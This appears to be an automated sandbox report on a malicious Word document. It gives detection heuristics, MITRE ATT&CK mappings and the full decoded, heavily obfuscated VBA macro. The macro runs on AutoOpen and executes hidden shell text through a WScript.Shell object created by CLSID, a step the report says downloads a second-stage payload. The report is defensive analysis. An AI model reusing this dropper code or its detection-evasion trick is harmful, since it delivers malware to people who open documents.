MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains a VBA macro that is triggered by the AutoOpen event. This macro uses the GetObject function to instantiate the dangerous WScript.Shell COM class, which is then used to execute a command. The command invokes cmd.exe with a complex PowerShell command that appears to download and execute a second-stage payload from a list of URLs.
Heuristics 9
-
ClamAV: Doc.Malware.Sload-6798975-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sload-6798975-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set cnJvbb = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + SQOqEFG) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set cnJvbb = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + SQOqEFG) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11448 bytes |
SHA-256: 386627124c0c89561318b543e71999b1fa44ba613b5061cb2781b46c24de0892 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
141 of 219 identifiers look randomly generated (e.g. 'LnUGccLjbh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XiKIjHY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
For Each jBwnIABM In TZwiwXp
nqniDuTlu = 187303609 + Oct(34826706) - 336618421 - CBool(310486486 / 250832287) * 188401206 + Log(iNHVjU - CLng(270746957)) - 31097637 + Hex(NYVYtzFC)
Next
Select Case wzGKdHdC
Case 90572707
vNjhwfw = Cos(243796439)
UJSBiw = 272623684
Case 142295984
MBdzwHqiL = Sqr(157041112 / CSng(240795702 - Cos(2056339 - 294441055) + GQIUiqYs + Rnd(325639837 - 92125382)))
iddwXNnl = Hex(pMuwRcr)
End Select
On Error Resume Next
For Each cGEVIfmE In fkjODANjR
NaJfTu = 202053439 + Oct(12474117) - 241545280 - CBool(40289406 / 181223454) * 307394783 + Log(pYUIJWl - CLng(278494891)) - 173946011 + Hex(CUWrKJYtS)
Next
Select Case wkLTb
Case 246841488
idBwXkP = Cos(283957038)
jsENjYnbG = 76358318
Case 324271425
UsMMJ = Sqr(305324442 / CSng(150269848 - Cos(33594618 - 88257105) + hXvHM + Rnd(165200992 - 342269374)))
jHAUafpE = Hex(azjMPo)
End Select
On Error Resume Next
For Each jHlnwV In TJOJPv
wutztbk = 198463702 + Oct(89890341) - 63769765 - CBool(227273320 / 181303980) * 260914280 + Log(aLPRi - CLng(224309549)) - 159991929 + Hex(CilCmHa)
Next
Select Case IdTkuwaKs
Case 132216808
FtbEWhE = Cos(292900201)
zrlNGbrPM = 286733362
Case 271344614
DNBFIDM = Sqr(199434707 / CSng(245900209 - Cos(32773554 - 163656335) + DTcbZO + Rnd(135842950 - 222648030)))
dAQsFi = Hex(ELzBiB)
End Select
Set azOisOLu = Shapes("LnUGccLjbh")
On Error Resume Next
For Each ohWdo In LOwHhlTS
LTvOH = 261020459 + Oct(325152602) - 273146137 - CBool(65061902 / 201797274) * 31439376 + Log(JJnUqXlMc - CLng(83289131)) - 58968951 + Hex(GNjLoinB)
Next
Select Case UZiDq
Case 112109720
qrMwjm = Cos(15622929)
LnqOh = 37219405
Case 215552032
KPHtElAbr = Sqr(19513089 / CSng(268450352 - Cos(267522956 - 235492448) + QAGUV + Rnd(242972158 - 341591331)))
wUKiA = Hex(rYUCn)
End Select
On Error Resume Next
For Each WzItdB In GSsbYW
onUqBpwLN = 82127321 + Oct(182722426) - 318417404 - CBool(161630097 / 169773907) * 46426675 + Log(BkzCQl - CLng(115674427)) - 290082511 + Hex(iCcTIhG)
Next
Select Case WuSwD
Case 88024544
RKkvRj = Cos(191032414)
zzqqbTiCW = 183930242
Case 133284964
nWsEiU = Sqr(286412917 / CSng(12240282 - Cos(205554929 - 264621455) + wXjlFBV + Rnd(175740636 - 274962661)))
LcUSq = Hex(lsswUiua)
End Select
On Error Resume Next
For Each DUrwTEjz In utdGj
XUacqi = 284541472 + Oct(242263498) - 205931359 - CBool(316808315 / 151145728) * 198147936 + Log(acjLQBCo - CLng(317390219)) - 309368363 + Hex(LwKpsbaX)
Next
Select Case McwRwj
Case 38445923
jLAwaw = Cos(162872676)
OiNFjdb = 164989841
Case 283558740
uXCsDV = Sqr(339118288 / CSng(85721211 - Cos(156183139 - 327241922) + ONkvpEku + Rnd(254153323 - 241723059)))
lQitN = Hex(kiBXah)
End Select
On Error Resume Next
For Each LFwolmvv In VCPQw
RMHGlvHh = 172364556 + Oct(245096901) - 30106271 - CBool(47692593 / 295793925) * 53344855 + Log(odKmpk - CLng(282762079)) - 81332244 + Hex(TDVnVRYF)
Next
Select Case zFcUL
Case 25781785
DYYDhfCnv = Cos(218912065)
FdHwazb = 258975607
Case 227690224
TLJMzEv = Sqr(16247464 / CSng(237249542 - Cos(129395595 - 117987158) + vlMSI + Rnd(338101944 - 261575517)))
isosT = Hex(vBidtYV)
End Select
On Error Resume Next
For Each ZoYIow In KTMNEnNMC
kFYKnm = 307734404 + Oct(306536180) - 322761375 - CBool(200424121 / 164071166) * 186130504 + Log(dBUHUzGt - CLng(74095763)) - 28710613 + Hex(GthkcmY)
Next
Select Case sGjRN
Case 52716451
BdNrUXil = Cos(236040801)
jjtPva = 165532235
Case 5345488
DuFKR = Sqr(67530268 / CSng(37357891 - Cos(109704046 - 236232111) + wkGziwc + Rnd(205961324 - 129494432)))
zXIzYsGf = Hex(wjHQKErvT)
End Select
IqGPlb = "" + EjumlNJ + rIiwN + szVdJqY + cowHofw + azOisOLu.TextFrame.TextRange.Text + NcPpXbK + YkJtKJt + rvYiw
On Error Resume Next
For Each UKvMwrA In rWtKY
EclUoWb = 313570060 + Oct(181871167) - 97418907 - CBool(16703311 / 125523553) * 69962090 + Log(fsjKn - CLng(223712250)) - 328101573 + Hex(nQuilloPa)
Next
Select Case jjdXJKS
Case 141411937
YjjKfjzaz = Cos(260969403)
WqfIoUaG = 239340730
Case 275055490
Lodma = Sqr(158611452 / CSng(53399989 - Cos(228303053 - 164016825) + SlZNGGPBm + Rnd(77667323 - 270228088)))
rCpEVio = Hex(MlHRXsjs)
End Select
Set cnJvbb = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + SQOqEFG)
On Error Resume Next
For Each cvtTwL In NJjGw
LYuCrlH = 159024179 + Oct(10700977) - 114156551 - CBool(341809066 / 282477380) * 164621820 + Log(rvzqCjN - CLng(124696706)) - 263127870 + Hex(warwct)
Next
Select Case lJuPMaI
Case 206604637
Mmadtc = Cos(154466760)
MRKtEOJs = 239146064
Case 182031833
RtKvI = Sqr(318116758 / CSng(93471256 - Cos(220057705 - 203674410) + fUrKnW + Rnd(176946168 - 290466881)))
ZWDJk = Hex(jbhukX)
End Select
On Error Resume Next
For Each RSIfc In NGUjlV
zwIRoU = 80599826 + Oct(183237391) - 31553705 - CBool(81329165 / 263971414) * 296880732 + Log(uVLqUOvl - CLng(249326603)) - 222486499 + Hex(VTirKFZnZ)
Next
Select Case pEduoHd
Case 184610185
GUmvar = Cos(309704463)
LWaaNON = 321244076
Case 138296704
URwmATDER = Sqr(228133013 / CSng(318446274 - Cos(211971202 - 48582585) + JZbajY + Rnd(28478727 - 770169)))
cNQzDc = Hex(PzTRIKNTT)
End Select
On Error Resume Next
For Each CXBwV In kaFtMwHwf
aflwWwa = 324539098 + Oct(49932651) - 43332925 - CBool(22781888 / 315330013) * 159627078 + Log(JbPksRB - CLng(164658214)) - 112169473 + Hex(huijPwTMJ)
Next
Select Case mkHSjDz
Case 29336400
PwoChkli = Cos(156741564)
NcBOo = 112129135
Case 183303821
thLmqm = Sqr(339998788 / CSng(243863181 - Cos(162381246 - 127975718) + DoUzjBAss + Rnd(323943178 - 320308683)))
NvGwwkV = Hex(BEjDXd)
End Select
On Error Resume Next
For Each TonIm In tWwcMYcY
PWtBIC = 125250304 + Oct(130989533) - 176726412 - CBool(76231135 / 255472242) * 7703190 + Log(noaJz - CLng(139812621)) - 222415354 + Hex(lzAsFQzc)
Next
Select Case LvUEKoda
Case 274867802
AUNzz = Cos(230820441)
jHCDYHqfd = 156437253
Case 295757031
DmTqr = Sqr(1078841 / CSng(282785419 - Cos(217802418 - 322036063) + AwjJThS + Rnd(162597548 - 12040272)))
JMhra = Hex(modYhRlR)
End Select
Const QNALk = 0
On Error Resume Next
For Each ZNJwEzQQk In jikwW
zlzToUzSD = 122828394 + Oct(60567217) - 252910204 - CBool(263602756 / 142975945) * 305067718 + Log(RvWFlflJ - CLng(41835121)) - 260224891 + Hex(uoTAhfkJ)
Next
Select Case CjFFOqsm
Case 279794995
cOMzQpZ = Cos(117476473)
TAoNA = 265152650
Case 33399313
kSbHDMH = Sqr(217042687 / CSng(222626361 - Cos(277506179 - 114144246) + umzScKQiq + Rnd(15883788 - 74507319)))
NiqnN = Hex(ERIMIUO)
End Select
On Error Resume Next
For Each sXwYiL In oRihDLUaz
dmHNR = 93376792 + Oct(253714629) - 307518484 - CBool(74237928 / 193829837) * 66789526 + Log(rAraBUuY - CLng(189777431)) - 300839240 + Hex(zXjXHVR)
Next
Select Case iFCcFpEb
Case 58795711
dXikAa = Cos(194570629)
cJAjYZjMI = 281370206
Case 246192579
fYtofioXl = Sqr(243841873 / CSng(320288192 - Cos(295626623 - 245406336) + wWsOWF + Rnd(304762958 - 114381033)))
IowhdttjN = Hex(ShFdtFSmF)
End Select
On Error Resume Next
For Each kOulYZNud In hlzXNHscC
RjEJuNO = 306484968 + Oct(132938481) - 44678136 - CBool(35345333 / 83726077) * 224459712 + Log(aWFwJER - CLng(64341018)) - 177215773 + Hex(jqdwwrtq)
Next
Select Case PZEKk
Case 284980461
LSaXuU = Cos(22771959)
wqCwTzE = 53378240
Case 36843335
cDkSvc = Sqr(84568973 / CSng(95069658 - Cos(38439880 - 120234253) + WMVEw + Rnd(300819081 - 335883400)))
DrMnIzHp = Hex(XJLRwsIna)
End Select
On Error Resume Next
For Each WjnHrtjz In twtiSZwQc
jzQDuAb = 285150139 + Oct(229749691) - 180322033 - CBool(90317939 / 267553921) * 158161488 + Log(OqJVsUOXQ - CLng(273117154)) - 268397469 + Hex(JNPbsVK)
Next
Select Case vmGdtHQ
Case 17151106
YdEaC = Cos(127044805)
QdYIPJj = 176228643
Case 93811891
qOcHir = Sqr(196789074 / CSng(336729588 - Cos(311422832 - 188211763) + fblDLWsM + Rnd(235709683 - 2301829)))
tmKPz = Hex(ImFfP)
End Select
cnJvbb.Run! IqGPlb, QNALk
On Error Resume Next
For Each vqpRq In CnDzOUKP
izPLb = 22952866 + Oct(182007354) - 251401169 - CBool(148832178 / 249306598) * 317170046 + Log(ssoXJfjzv - CLng(337107283)) - 216716594 + Hex(IqlPwd)
Next
Select Case QviWj
Case 16564019
zBUETfu = Cos(260597063)
vObEo = 172403376
Case 120183546
jSADk = Sqr(120851400 / CSng(77609858 - Cos(273243294 - 294873424) + fEOVIUij + Rnd(223313306 - 194652135)))
jBUUjpAUZ = Hex(qdXnNB)
End Select
On Error Resume Next
For Each CIwoIj In UpKGzuGiZ
ErLnM = 274016439 + Oct(302504047) - 128273537 - CBool(257595962 / 327257783) * 98426118 + Log(zTNQGQI - CLng(282746216)) - 248467681 + Hex(wwwUIrXh)
Next
Select Case UfcfXjZqS
Case 27785080
Vlhtsqt = Cos(220975559)
pZiXWtNp = 289063528
Case 220463383
vFwuw = Sqr(138315026 / CSng(262679293 - Cos(276609647 - 214655008) + apmQNMQF + Rnd(184558607 - 115948183)))
quJuwFJiW = Hex(wlBZPnmw)
End Select
On Error Resume Next
For Each YQbbLniDc In jUWkQNHA
qSdfIwU = 120577970 + Oct(271992514) - 299032766 - CBool(316893345 / 78029511) * 137516407 + Log(EknqNBNQd - CLng(178955119)) - 273131765 + Hex(LCBdwPS)
Next
Select Case CbvlTdrUp
Case 69591062
ULURzcWt = Cos(334535781)
ZoBqmm = 121311512
Case 109292434
wjsazc = Sqr(273330737 / CSng(12088428 - Cos(151481683 - 239703604) + tbTuVJ + Rnd(283690798 - 239875226)))
AaVUd = Hex(ntvhqYE)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.